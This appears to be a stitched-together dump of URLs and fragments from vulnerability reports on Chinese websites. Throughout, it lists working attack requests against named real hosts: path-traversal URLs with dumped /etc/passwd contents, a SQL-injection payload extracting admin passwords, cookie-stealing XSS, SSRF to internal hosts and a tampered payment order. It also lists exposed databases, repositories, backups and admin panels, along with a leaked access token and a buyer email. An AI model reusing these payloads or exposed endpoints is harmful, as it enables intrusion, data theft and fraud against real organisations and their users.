http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://221.230.140.60:8080/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://218.93.201.187:8888/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://221.230.8.231:8081//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://222.184.250.2:8001//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://58.211.131.154:84//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://58.221.214.82:82//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://58.214.247.138:8088/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://yianjkong.vicp.cc:8081/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://www.szcdc.cn/wstjnew/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv=为例,上海市化工职业病防治为例 http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10076&dt=&bhkrsl=&mhkadv= http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://221.1.104.11:8011/ExtWebModels/WebFront/ShowLand.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowLand.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowLand.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowLand.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowLand.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowLand.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowLand.aspx?id= http://lobby.dreambrother.cn:9090/lobby/gold/trade?sn=8bf997e6f86b920b64c68d424cd0f750c8*********************&ln=1&cl=2&ch=apple_yu_center&nu=20&fm=0 http://lobby.dreambrother.cn:9090/gold/trade/alipay/page?sn=8bf997e6f86b920b64c68d424cd0f750c8**********************&orderId=a9c3ae40ecba5bf65764146***********&coins=600.0&subject=金币充值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用 http://lobby.dreambrother.cn:9090/gold/trade/alipay/page?sn=8bf997e6f86b920b64c68d424cd0f750c8379164db3d4983&orderId=a9c3ae40ecba5bf65764146159d4280b&coins=0.001&subject=金币充值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用 http://222.41.169.2/ http://jns.nju.edu.cn/Manage/Roleregister.aspx?username=wooyun http://jns.nju.edu.cn/manage/EmployeeManage.aspx http://sr.jxdcw.com/houseview/17/ http://www.jnsqw.gov.cn/html/querylist.aspx www.gqtyzsw.com(2011-08-09) www.zcsgtzyj.gov.cn www.china-shuihu.cn(2011-08-01) www.jnhaibeier.com(2011-08-22) www.jnajj.gov.cn(2011-08-26) http://183.136.157.21/Index.aspx http://price.zol.com.cn/article/new/key_book_list.php?keyword_id=2677&subclass_id=232 http://wsyc.ybklzx.com//Soft/Student/StuManage.aspx http://www.zjkljjx.com/Soft/Student/StuManage.aspx http://www.qwyxjx.com/Soft/Student/StuManage.aspx http://221.214.164.198:1039/Soft/Student/StuManage.aspx http://211.157.186.169:8011/Soft/Student/StuManage.aspx http://222.223.229.50:8080/Soft/Student/StuManage.aspx http://www.sjzsajx.com/Soft/Student/StuManage.aspx http://www.zljx.net:8080//Soft/Student/StuManage.aspx http://111.63.18.151:81/Soft/Student/StuManage.aspx http://www.ylrsjt.com//Soft/Student/StuManage.aspx http://110.249.129.242/Soft/Student/StuManage.aspx http://dhjx.1039.cn/Soft/Student/StuManage.aspx http://www.qwyxjx.com/Soft/Student/StuManage.aspx http://www.ylrsjt.com//Soft/Student/StuManage.aspx http://www.sjzsajx.com//Soft/Student/StuManage.aspx http://110.249.129.242/Soft/Student/StuManage.aspx http://www.whshjx.com/Soft/Student/StuManage.aspx http://www.zjkljjx.com/Soft/Student/StuManage.aspx http://www.xmjdjx.cn/Soft/Student/StuManage.aspx http://www.healthnews.com.tw/readnews.php?id=19917 http://dev.appchina.com/ http://dev.appchina.com/market/common/download_banner.action?appId=100062&filename=../../../../../../../../../../etc/passwd http://dev.appchina.com/market/common/download_bigIcon.action?appId=100062&filename=../../../../../../../../../../etc/passwd http://xtdw.cnxiantao.com/UploadFile/Product/dama.asp http://www.qhdmj.org.cn/news.jsp?id=988 inurl:/xxgk/jcms_files http://dq12333.gov.cn/fileDownload.jsp?fileName=../../../../../../../../../../../etc/passwd www.api.zhuna.cn http://183.131.78.93:9200/_search/ http://www.kibey.com/,他们有个产品还是比较出名的,URL为: http://echo.kibey.com/ http://183.131.78.93/#/dashboard/db/kibeycom-stats-system http://www.didapinche.com:9022/app/myincome/?user_cid=469c6750-4ba2-49ce-8baa-43e8640229ac http://zone.wooyun.org/content/18915 http://115.238.170.67:9200/_search http://124.238.233.74:9200/_search http://visa.baidu.com/_search?pretty http://ana.xueshupingtai.com/user/listUser等后台子页面直接访问后台 http://ana.xueshupingtai.com/statics/admin/js/login/login.js等暴露了后台判断机制 http://mba.cufe.edu.cn/root.rar,直接下载全站备份 http://mba.cufe.edu.cn/admission/stupic/100344119992777.jpg http://58.68.250.157 http://58.68.250.157:9200 http://travel.jxntv.cn http://travel.jxntv.cn///tbcat.php?id=380200463 http://update.readboy.com/ http://www.gbiac.net/invoker/JMXInvokerServlet http://renzheng.baidu.com/site/search/?q=a https://rt.foxitsoftware.cn/ http://rc.z jswrc.zjol.com.cn/index_gangwei_x_x.php?id=3105&x=2105 http://content.businessvalue.com.cn http://content.businessvalue.com.cn:80/ http://mei.zoomla.cn/guestbook/Default.aspx?__EVENTTARGET=&txtID=&__VIEWSTATE=&__LASTFOCUS=&EBtnSubmit=a&DropDownList1=1&DDLCate=1&CateID=1&Button1=a&FilePicPath=fbangd&HdnCateID=0&TxtTContent=&TxtTTitle=&__EVENTARGUMENT=&txtName=a http://mei.zoomla.cn/ http://122.13.211.236:9200/_search?pretty http://service.hexun.com/1.aspx http://zhidao.baidu.com/liuyan/detail?id=5809 http://zhidao.baidu.com/api/comment?app=article&thread_id=10000005809&method=get_reply&encoding=gbk&start=0&limit=10&r=1425448854170 https://117.78.4.25:9200/ http://www.chiscdc.com/ http://221.230.140.60:8080/grcx/grdetail.asp?bhkidx=10097 http://218.93.201.187:8888//grcx/grdetail.asp?bhkidx=10097 http://221.230.8.231:8081//grcx/grdetail.asp?bhkidx=10097 http://222.184.250.2:8001//grcx/grdetail.asp?bhkidx=10097 http://www.shhgzf.com:8280/grcx/grdetail.asp?bhkidx=10097 http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10097为例:宿迁市疾病预防控制中心 http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10097 http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10096 http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10096 http://gmdata.lianwifi.com/.svn/all-wcprops http://gmdata.lianwifi.com/.svn/entries http://www.zs.gdciq.gov.cn/4_search_test.jsp http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900 http://www.wooyun.org/bugs/wooyun-2015-091829 http://cx.wap.unisk.cn/user/user/login.action,已经直接显示网页源码了,然后各处翻,终于找到了个注入 http://m.unisk.cn/Count2.asp?id=1320356&speid=300 http://123.125.97.162/admin/manage/ http://123.125.97.162:6060/jcard/demo.php?p= http://i.wo.cn/ http://youxuan.homeinns.com/这个域名 http://www.mafengwo.cn/event/eve_pic.php?iid=3037383 http://www.mafengwo.cn/event/event.php?iid=3037383 http://221.231.103.196:8080/ycfc/manage/login!login.action http://m.yiqifei.com/i/albumlist/704138.html http://m.yiqifei.com/i/albumview/704138/1341.html http://m.yiqifei.com/i/albumlist/704138.html http://218.75.127.195:808/xOA/ http://www.mafengwo.cn/event/eve_show.php?iid=3037383&ga_id=168041 http://bs.hubu.edu.cn/news.aspx?Tname=tb_index&id=1052 http://wzzxbs.mofcom.gov.cn/app/entp/guide http://210.76.69.83/app/entp/guide http://121.10.6.231/app/entp/approve http://218.87.46.161/WebProJX/app/entp/approve http://222.240.202.23:8080/WebProHNFI/app/entp/approve http://210.25.0.75/app/entp/approve http://210.76.69.83/app/entp/guide为例进行测试, http://210.76.69.83/app/entp/faq http://infohubei.com/plus/rss.php http://active.zol.com.cn:80 http://www.laofengxiang.com/data/可目录遍历,如下图所示: http://www.laofengxiang.com/data/lfx_new.20141230.sql中可以得到后台管理员账户及密码md5值,如下所示: http://wkf.homeinns.com/ http://beijing.lashou.com/s/xiuxianyule/i*/all http://www.corporatetravel.ctrip.com/ http://www.myzte.com http://www.gdyueyun.com/Stage/AnnualReport.aspx http://www.gdyueyun.com/Stage/SearchPage.aspx?key a02:40PM a02:40PM a09:28AM http://ldj.jiangmen.gov.cn/flash_upload.php?modelid=1 http://ldj.jiangmen.gov.cn/flash_upload.php http://iqqy.gdbnet.cn/MSP/DownloadFiles/DownLoadCab.jsp?filename=../../../../../../../../../../etc/passwd http://iqqy.gdbnet.cn/axis2/axis2-admin/ http://cmu1h.com/view.asp?d_id=4504 http://61.161.172.86/ys/info/28%3b http://59.46.70.155:8080/sign/entrance.jsp?typeId=8c1825c8-e7aa-429a-aec7-871a7e9891a7 http://www.cmu4h.cn/default/contents/content/i/238 http://bdwsw.zhanchenggame.com/admin/ http://www.yfjt.gov.cn//news/showmessage.asp?borderid=%5c*&PageNo=2 http://www.yfjt.gov.cn/news/shownews.asp?newsid=%5c&page=1 http://techshow.ctrip.com/ http://mzaoniao.wm.yiqifei.com/Account/Login?returnUrl=%2FMember http://youhui.egou.com/baoliao/baoliao_publish.htm http://182.92.159.210/index.php http://cloudtouch.91160.com/ http://cloudtouch.91160.com/index.php?c=cancel&a=orderinfo&order_no=1开头八位数的订单号 http://cloudtouch.91160.com//index.php?c=cancel&a=cancelorder&order_no=1开头的八位订单号 http://cloudtouch.91160.com//index.php?c=cancel&a=cancelorder&order_no=18216202 http://211.90.246.47/webele/index.jsp http://www.hfjs.gov.cn/Article/Article.jsp?article_id=130329890560 http://yx.yiqifei.com http://cdp.jsbc.cdvcloud.com/api/v2?userId=xinmeibianji&userName=%E6%96%B0%E5%AA%92%E7%BC%96%E8%BE%91&accessToken=dfd4fe2bf0c1b40debfd40a8fb09ee4f http://124.160.127.151:9200/_search root:x:0:0:root:/root:/bin/bash","bin:x:1:1:bin:/bin:/sbin/nologin","daemon:x:2:2:daemon:/sbin:/sbin/nologin","adm:x:3:4:adm:/var/adm:/sbin/nologin","lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin","sync:x:5:0:sync:/sbin:/bin/sync","shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown","halt:x:7:0:halt:/sbin:/sbin/halt","mail:x:8:12:mail:/var/spool/mail:/sbin/nologin","news:x:9:13:news:/etc/news:","uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin","operator:x:11:0:operator:/root:/sbin/nologin","games:x:12:100:games:/usr/games:/sbin/nologin","gopher:x:13:30:gopher:/var/gopher:/sbin/nologin","ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin","nobody:x:99:99:Nobody:/:/sbin/nologin","nscd:x:28:28:NSCD Daemon:/:/sbin/nologin","vcsa:x:69:69:virtual owner:/dev:/sbin/nologin","pcap:x:77:77::/var/arpwatch:/sbin/nologin","rpc:x:32:32:Portmapper user:/:/sbin/nologin","mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin","smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin","ntp:x:38:38::/etc/ntp:/sbin/nologin","sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin","rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin","nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin","dbus:x:81:81:System bus:/:/sbin/nologin","haldaemon:x:68:68:HAL daemon:/:/sbin/nologin","avahi:x:70:70:Avahi daemon:/:/sbin/nologin","avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin","xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin","gdm:x:42:42::/var/gdm:/sbin/nologin","sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin","nexus:x:502:502::/home/nexus:/bin/bash","paasAdmin:x:503:500::/bee/app/paasAdmin:/bin/bash","epedu:x:504:500::/bee/app/epedu:/bin/bash","ixinTest:x:505:500::/bee/app/ixinTest:/bin/bash","ecityServer:x:506:500::/bee/app/ecityServer:/bin/bash","iam:x:507:500::/bee/app/iam:/bin/bash","iam4ixin:x:508:500::/bee/app/iam4ixin:/bin/bash","ecity:x:509:500::/bee/app/ecity:/bin/bash http://211.151.7.139:8082/user/login。显示TCL通讯。 http://180.209.64.253:866/login.aspx http://222.128.5.168:81/introduction/,该网站貌似专注于北邮人脸识别。 http://182.254.201.58:9200/_search http://182.254.196.137:9200/_search http://182.254.201.126:9200/_search http://182.254.202.95:9200/_search http://182.254.232.22:9200/_search root:x:0:0:root:/root:/bin/bash","bin:x:1:1:bin:/bin:/sbin/nologin","daemon:x:2:2:daemon:/sbin:/sbin/nologin","adm:x:3:4:adm:/var/adm:/sbin/nologin","lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin","sync:x:5:0:sync:/sbin:/bin/sync","shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown","halt:x:7:0:halt:/sbin:/sbin/halt","mail:x:8:12:mail:/var/spool/mail:/sbin/nologin","uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin","operator:x:11:0:operator:/root:/sbin/nologin","games:x:12:100:games:/usr/games:/sbin/nologin","gopher:x:13:30:gopher:/var/gopher:/sbin/nologin","ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin","nobody:x:99:99:Nobody:/:/sbin/nologin","dbus:x:81:81:System bus:/:/sbin/nologin","vcsa:x:69:69:virtual owner:/dev:/sbin/nologin","abrt:x:173:173::/etc/abrt:/sbin/nologin","haldaemon:x:68:68:HAL daemon:/:/sbin/nologin","ntp:x:38:38::/etc/ntp:/sbin/nologin","saslauth:x:499:76:\"Saslauthd saslauth:/sbin/nologin","postfix:x:89:89::/var/spool/postfix:/sbin/nologin","sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin","tcpdump:x:72:72::/:/sbin/nologin","nscd:x:28:28:NSCD Daemon:/:/sbin/nologin","nslcd:x:65:55:LDAP User:/:/sbin/nologin","nginx:x:498:497:Nginx server:/var/lib/nginx:/sbin/nologin","www:x:10126:10051::/home/www:/sbin/nologin","nagios:x:10127:10127::/home/nagios:/sbin/nologin","apache:x:48:48:Apache:/var/www:/sbin/nologin http://jtzf.cq.gov.cn/ http://jtzf.cq.gov.cn/jeecms/login.jspx http://jtzf.cq.gov.cn/jeecms/login.jspx页面后显示: http://www.yqwgxj.gov.cn/view.asp?n=1012 http://api.bbs.miui.com/ http://api.bbs.miui.com/app/forum/viewthread?tid=$tid http://www.miui.com/thread-2369752-1-1.html http://api.bbs.miui.com/app/forum/viewthread?tid=2369752 http://api.bbs.miui.com/app/forum/reply https://github.com/whitefoxx/xb-test/blob/1a710e4836d0c44edd933369afd3fba65cf8e003/xinshu/settings/production.py http://live.cdvcloud.com/ http://www.gdshzscq.gov.cn/login.do https://sslvpn.comba.com.cn http://mcm.pc.e-health.org.cn/login/ssoLogin_doctor.action url:http://211.95.193.67 http://mooc.chaoxing.com/ http://video.chaoxing.com/serie_400000478.shtml http://fmxy.bdschool.cn/content.php?id=1276 http://video.bdschool.cn/person/updateMyAccount.do http://www.hwtrip.com/v3/visa/product/detail?visaID=3 www.wsjf.sdnu.edu.cn http://www.pingan.com/cms-tmplt/portalJsonpController.do?callback=jsonp1&method=articleList&channelId=424&channelLevel=2&number=10&pageNumber=1&publishDate=&_=1425241672662 IP:http://183.129.178.138/ http://183.129.178.138:9200 http://www.ynact-edu.com/web.rar http://www.ynact-edu.com/adminmanager http://www.ynact-edu.com/linkimgs/20153519375773499.aspx http://www.taiwan-story.com.tw/news_content.php?id=337 http://115.29.227.25:8080/Login.aspx https://nykj.91160.com http://adsstory.com/ IP:http://182.92.216.104 http://182.92.216.104:9200 http://59.151.102.38/ http://182.92.3.28 http://182.92.3.28:9200/ https://rt-express.com/rt_home/rb/ogsu_main.php https://rt-express.com/rt_home/be/ogsu_profile.php https://zzyeb.ly.com http://www.u2wifi.cn/ IP:http://182.92.159.210/ http://182.92.159.210:9200 http://115.182.51.225/control.html http://115.182.51.182:8090//web/dept.php http://www.shandongipc.gov.cn/news_p.php?idp=52 http://117.78.0.172/home/news/27 http://115.182.69.104/icsquiz/cocoslin2/ http://iosui.youyuan.com/index.jwml http://iosui.youyuan.com/.svn/entries http://www.cs-airport.com/businessdetails.aspx?id=44&iid=213 http://www.cs-airport.com/CustomerArticle.aspx?t=38&id=51 http://www.cs-airport.com/onlinearticlelist.aspx?id=22 http://www.cs-airport.com/purchasedetails.aspx?id=7&t=2 http://ensupport.zte.com.cn:9080 http://folhk.zte.com.cn:9080 http://oa.homeinns.com http://mail.homeinns.com www.vc.cn http://www.ztemall.com http://m.wxlib.cn/m/info/newbook.action?clsNo=A http://m.wxlib.cn/m/info/newbook.action?clsNo=A https://www.51dns.com/payments/alipay/alipayapi.php?WIDout_trade_no=201503061144180998&WIDshow_url=51DNS.COM&WIDbody=51DNS.COM&WIDsubject=51DNS.COM&WIDtotal_fee=200 https://www.51dns.com/payments/alipay/alipayapi.php?WIDout_trade_no=订单号&WIDshow_url=51DNS.COM&WIDbody=51DNS.COM&WIDsubject=51DNS.COM&WIDtotal_fee=价格 http://www.gxczzx.gov.cn/news_view.php?id=17911 http://www.xiaohongchun.com/api/user/get_uid?nick=suki_悦 http://oa.eptok.com:8080/vmain/login.jsp http://y.adzhichuan.com/js/webcgi.php?data=eyJib2R5Ijp7InVzZXJfaWQiOi******* http://www.dianyinggongchang.com/?c-feedback-a-addfeedback http://lvxun.yiqifei.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowInvestor.aspx?id= javascript://www.discuz.net/ https://www.51dns.com/member/domain?domain=%22%3E%3Csvg/onload=alert%28document.cookie%29%3E https://www.51dns.com/member/account-edit https://www.51dns.com/member/domain/detail/7834541?controller=members/operate https://www.51dns.com/member/domain/detail/域名ID?controller=members/operate https://www.51dns.com/member/domain/detail/ https://www.51dns.com/member/domain/detail/7834541的源码 file:///storage/local.html http://221.1.104.11:8011/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://221.2.171.59:8300/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://demo.inongyou.cn/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://rctdlz.cn/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://60.2.214.118:8088/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://121.17.2.52/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://61.186.154.210:8088/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://dujia.zhuna.cn/log.txt notify_url_log:isSign=false,discount=0.00&payment_type=1&subject=杭州第一世界大酒店高级房2天1晚+双早+云曼温泉2张&trade_no=2014112738950417&buyer_email=ganlei1984_1984@sina.com&gmt_create=2014-11-27 http://www.huaian.gov.cn http://dzj.huaian.gov.cn http://jw.huaian.gov.cn http://mzzjj.huaian.gov.cn等等 http://fd-txt.pingan.com.cn:8080/friendscircle/rest/article/create www.gddx.cn http://edm.ganji.com/statistics/click?sid=1450011566011&st=20141214&data=aHR0cDovL2FxZW1haWxlLnNuZm5udXcuY29tLw==&ca_name=edm_mainsite-emailconfirm_1450011566011_2&sig=y2UsIAPWVACWyCtMCUZ%2foHgpcYM%3d http://ask.zhidao.189.cn/ http://www.sysbio.org.cn/english/ShowInfo.php?id=8 http://115.182.4.197:8080/login.jsp http://blog.iunios.com http://61.161.206.118:8889/Login.aspx http://218.57.22.48/portal/local/index.html http://121.40.57.148:9200/ http://www.ycscszh.gov.cn/news.asp?ID=241,注入点:ID http://211.90.241.58/WebApp/emoss//files/login/login.jsp www.yztzairport.net https://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049772&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049144&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049217&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049195&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049268&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049209&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049292&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049250&ETPA=0 http://zhongyi.ifeng.com/ http://www.multigold.com.cn/ http://210.43.126.80:8080/gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://218.75.27.177/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://101.76.99.20/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://211.64.205.214/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://yjsy.wmu.edu.cn:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://61.187.179.68:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://yjsy.wzmc.edu.cn:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://210.43.126.80:8080/gmis/SysMsg/sys_useEdit.aspx?id= http://218.75.27.177/Gmis/SysMsg/sys_useEdit.aspx?id= http://101.76.99.20/Gmis/SysMsg/sys_useEdit.aspx?id= http://211.64.205.214/Gmis/SysMsg/sys_useEdit.aspx?id= http://yjsy.wmu.edu.cn:8080/Gmis/SysMsg/sys_useEdit.aspx?id= http://61.187.179.68:8080/Gmis/SysMsg/sys_useEdit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/SysMsg/sys_useEdit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://211.64.205.214/Gmis/SysMsg/sys_useEdit.aspx?id= intitle:bytevalue http://singularity.geekpark.net/.git/config net:singularity.git http://60.190.151.150/后 http://wap.yichedai.com/index.php/home/index?code=04&error=123123?uname=jillshux&phone=555-666-0606&siteId=1 http://122.112.15.162/index.php https://github.com/hemaoliang/py-machine-learning/blob/fa23b1b1c388d24a0e7a6af4ea3a08e7e03ca1cf/ganjismtp/ganjimail.py http://glxy.mot.gov.cn/, http://glxy.mot.gov.cn/BM/AdmitAction_publishList.do, http://www.adream.org/ http://180.97.68.244:9200/,如图: http://115.182.9.116/admin/ http://srm.hikvision.com http://211.140.151.107/ http://183.129.135.196/ http://gpm.shjgu.edu.cn/ http://202.96.111.90/ http://zhsx.lszjy.com/ http://bysj.zfc.edu.cn/ http://bysj.jxvtc.edu.cn/ http://211.140.151.107/ http://211.140.151.107/wap http://211.140.151.107/wap/Check.asp http://211.140.151.107/wap/Check.asp http://211.140.151.107/wap/ http://www.marcopolo.com.cn/flash.html#/CONTACT/Contact_Form http://www.dnion.com/ http://".$ip."/../../../../../../../..".$file http://shop.tcl.com/ http://me.ctrip.com/hotel/myCtrip/login.html im.xxwan.com/*** user.xxwan.com/userInterfacea\=_ bbs.cmge.com/uc_server_ client.cmge.com/gameInfoAction\!getGameInfoDetailByArticleId?articleId\= http://zone.wooyun.org/content/18890 https://github.com/edwinxu/G46POPO/blob/82556fd49e6c28f13f7daa4da3054f2c1440b929/plugin/popoTrigger/triggerTeam/mail.py http://61.185.224.55/login.jsp jdbc:oracle:thin:@172.16.224.200:1521:czww1 android:exported="false",若需要外部调用,需自定义signature或者signatureOrSystem级别的权限 http://222.68.19.99/base/PublicInfo_login.action www.hnxinxi.com http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=图片url http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://www.qq.com/ http://www.qq.com/没有数据返回,url末尾添加#p.jpg http://www.qq.com/%23p.jpg http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://family.baidu.com%23p.jpg http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://erp.baidu.com%23p.jpg http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://security.baidu.com%23p.jpg http://www.17u.com/question/ques_search.asp?idtype=2&search_type=dqmore&id=343 http://www.chsin.com/xlcx/zl/query.asp?Page=2&type=&user=zhujunhua http://demo.netinnet.cn/netinnet_zhsx_V3/douploaddatafile?action=common_img&start=upload_img&fm_maxSize=10240&fm_subdir=../ http://www.rcj99.com/ruicj@hjfdfacrdda1233123qwe/ http://drops.wooyun.org/papers/3133 http://ais.oceansking.com.cn/flex/index.jsp http://kaoshi.yjbys.com/kaoshi.yjbys.com.rar http://cloudtouch.91160.com/ http://book.haedu.cn/news/view.asp?ID=51424982 www.muyouguoji.com存在svn漏洞。 http://www.yundaex.us http://www.yundaex.us/member/user_wel.aspx www.yundaex.us http://myph.mingyi.com.cn/,直接来到明一国际,办公系统喷绘系统前台,如图所示: http://myph.mingyi.com.cn/tz/Tz_show.aspx?tid=33,测试发现存在注入,如图所示: http://www.docin.com/touch_new/preview_new.do?id=569369801 http://gefco.cae.com.cn:443/ http://www.zhuna.cn/e/b2.php?hid=88952634&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10#47436f33-d5e2-4310-8d4a-9eec17a9e962 http://www.zbws.gov.cn/onews.asp?ID=81135 http://www.zbws.gov.cn/onews.asp?ID=81135 http://www3.ahu.edu.cn/ysxy/ http://www3.ahu.edu.cn/ysxy/list.asp?CategoryID=1 http://m.zol.com.cn:80/topic/mwc/list.php?id=3085 http://youxi.zol.com.cn:80/GameData/index.php?c=Tag&db_id=9&info_id=39740&tag_id=46 http://m.zol.com.cn/article/comment_4911432_1.html?ssid=&j=simple&uid=%3E%22%3E%3CScRiPt%3Ealert%281%29%3C/ScRiPt%3E http://article.zol.com.cn/test/phpinfo.php http://ztalk.zol.com.cn/phpinfo.php http://down.chinaz.com/soft/29472.htm inurl:Careers_yp.asp http://www.gaonengkedi.com/Careers_yp.asp?id=4 http://njqygl.com/Careers_yp.asp?id=1 http://www.sxqykx.com/Careers_yp.asp?id=1 http://www.yxxgjx.com/Careers_yp.asp?id=1 http://www.keyi2009.com.cn/Careers_yp.asp?id=2 http://www.yuanhui.cc/Careers_yp.asp?id=1 http://wapchangzhi.com/Careers_yp.asp?id=1 http://www.lyyehuaqi.com/Careers_yp.asp?id=9 http://www.bjxhly.com/Careers_yp.asp?id=12 http://www.tairongdanbao.com/Careers_yp.asp?id=2 http://av.caep.ac.cn//login.php http://av.caep.ac.cn/client_manage\clear\max.php http://spider2.enorth.com.cn:8000/order/admin_user_order/admin_channel_order_match/order_match.do?action=list&edit_class_id=31 http://spider2.enorth.com.cn:8000/order/admin_user_order/admin_channel_order_match/order_match.do?action=addBegin&edit_class_id=31 http://go.yiqifei.com/admin/ http://www.zqkjxyjob.cn/file_download.php http://www.zqkjxyjob.cn/download_file.php?id=151&file_name=1350866433&file_times=4982&file_truename=%B1%CF%D2%B5%B6%A5%B8%DA%CA%B5%CF%B0%B9%DC%C0%ED%B0%EC%B7%A8%20%202012-2013.doc http://www.zqkjxyjob.cn/download_file.php?id=151&file_name=1350866433&file_times=4982&file_truename=index.php http://www.xgkjs.net.cn/webapp/sm_login.asp http://www.goodo.com.cn/ http://www2.goodo-edu.com/Web/goodoweb/216005.htm inurl:/EduPlate/ http://www.qhdsf.gov.cn/data/userfile/%E5%8D%A2%E9%BE%99%E9%95%87/inbox/20110928063350%E5%A4%A9%E5%A4%A7%E6%B5%B7%E5%BE%B7ftp.txt http://flights.ctrip.com http://wooyun.org/bugs/wooyun-2015-096440 http://221.1.104.11:8011/ExtWebModels/LandManage/WaterManage.aspx?id= http://221.2.171.59:8300/ExtWebModels/LandManage/WaterManage.aspx?id= http://demo.inongyou.cn/ExtWebModels/LandManage/WaterManage.aspx?id= 